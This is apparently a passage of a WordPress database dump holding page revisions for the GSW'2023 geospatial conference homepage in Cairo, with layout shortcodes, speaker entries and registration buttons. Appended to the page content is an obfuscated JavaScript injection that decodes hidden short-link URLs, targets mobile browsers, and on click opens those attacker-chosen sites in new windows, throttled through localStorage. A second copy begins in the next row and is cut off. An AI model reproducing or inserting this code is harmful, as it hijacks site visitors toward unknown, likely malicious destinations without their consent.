soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDYzMDQuODI5OTg2MTMxMjcxJTIxMmQtMTIyLjQ3NDY5NjgwMzMwOTIlMjEzZDM3LjgwMzc0NzUyMTYwNDQzJTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4ODA4NTg2ZTYzMDI2MTVhMSUyNTNBMHg4NmJkMTMwMjUxNzU3YzAwJTIxMnNTdG9yZXklMkJBdmUlMjUyQyUyQlNhbiUyQkZyYW5jaXNjbyUyNTJDJTJCQ0ElMkI5NDEyOSUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc3VzJTIxNHYxNDM1ODI2NDMyMDUxJTIyJTIwd2lkdGglM0QlMjI2MDAlMjIlMjBoZWlnaHQlM0QlMjI0NTAlMjIlMjBmcmFtZWJvcmRlciUzRCUyMjAlMjIlMjBzdHlsZSUzRCUyMmJvcmRlciUzQTAlMjIlMjBhbGxvd2Z1bGxzY3JlZW4lM0UlM0MlMkZpZnJhbWUlM0U=\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:56:13','2022-10-07 12:56:13','',2167,'https://gsw2023.com/?p=2384',0,'revision','',0),
(2385,1,'2022-10-07 12:57:09','2022-10-07 12:57:09','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 